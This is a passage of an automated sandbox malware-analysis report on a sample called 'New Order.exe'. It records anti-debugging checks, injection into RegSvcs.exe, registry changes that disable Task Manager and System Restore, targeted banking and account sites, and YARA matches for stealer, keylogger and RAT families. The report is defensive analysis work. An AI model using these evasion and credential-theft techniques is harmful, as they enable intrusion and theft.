Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598682	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598578	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598468	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598359	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598249	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598140	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598031	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597921	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597812	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597703	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597593	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597484	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597375	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597265	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597046	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596717	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596609	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596500	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596390	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596280	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596171	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596062	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595953	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595843	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595734	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595625	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595515	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595406	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595296	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595187	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595078	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594968	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594859	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594750	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 594640	Jump to behavior

Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3709427363.0000000001100000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllM^
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - COM.HKVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - HKVMware20,11696501413]
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696501413j
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696501413\|UE
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696501413h
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413}
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696501413x
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696501413s
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU East & CentralVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696501413t
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696501413t
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.comVMware20,11696501413}
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - EU WestVMware20,11696501413n
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696501413u
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - NDCDYNVMware20,11696501413z
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - non-EU EuropeVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactiveuserers.co.inVMware20,11696501413~
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactiveuserers.co.inVMware20,11696501413d
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive userers - GDCDYNVMware20,11696501413p
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696501413
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696501413^
Source: RegSvcs.exe, 00000002.00000002.3713079152.00000000041AA000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696501413o
Source: RegSvcs.exe, 00000002.00000002.3713079152.000000000414F000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696501413f

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Anti Debugging

Potentially malicious time measurement code found

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002CD010 Start: 002CD039 End: 002CD029

0_2_002CD010

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002CD010 rdtsc

0_2_002CD010

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0033EAA2 BlockInput,

0_2_0033EAA2

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_002F2622

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

2_2_004019F0

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002C42DE

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E4CE8 mov eax, dword ptr fs:[00000030h]	0_2_002E4CE8
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_014C3510 mov eax, dword ptr fs:[00000030h]	0_2_014C3510
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_014C34B0 mov eax, dword ptr fs:[00000030h]	0_2_014C34B0
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_014C1E70 mov eax, dword ptr fs:[00000030h]	0_2_014C1E70

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00320B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

0_2_00320B62

Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002F2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002F2622
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_002E083F
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E09D5 SetUnhandledExceptionFilter,	0_2_002E09D5
Source: C:\Users\user\Desktop\New Order.exe	Code function: 0_2_002E0C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_002E0C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 2_2_004123F1 SetUnhandledExceptionFilter,	2_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\New Order.exe

Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\New Order.exe

Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: B71008

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

0_2_00321201

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00302BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_00302BA5

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0032B226 SendInput,keybd_event,

0_2_0032B226

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_003422DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,

0_2_003422DA

Source: C:\Users\user\Desktop\New Order.exe

Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\New Order.exe"

Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

0_2_00320B62

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00321663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

0_2_00321663

Source: New Order.exe	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: New Order.exe	Binary or memory string: Shell_TrayWnd

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002E0698 cpuid

0_2_002E0698

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: GetLocaleInfoA,

2_2_00417A20

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_00338195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,

0_2_00338195

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_0031D27A GetUserNameW,

0_2_0031D27A

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002FB952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

0_2_002FB952

Source: C:\Users\user\Desktop\New Order.exe

Code function: 0_2_002C42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_002C42DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings

Disable Task Manager(disabletaskmgr)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry value created: DisableTaskMgr 1

Jump to behavior

Disables Windows system restore

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\SystemRestore DisableSR

Jump to behavior

Disables the Windows task manager (taskmgr)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Registry key created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System DisableTaskMgr

Jump to behavior

Stealing of Sensitive Information

Yara detected PureLog Stealer

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Snake Keylogger

Source: Yara match

File source: 00000002.00000002.3710743916.0000000002E01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.5470000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b88866.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0ee8.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.53e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.RegSvcs.exe.2b8974e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.3715795164.0000000005470000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3710406360.0000000002B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.3715183303.00000000053E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7392, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
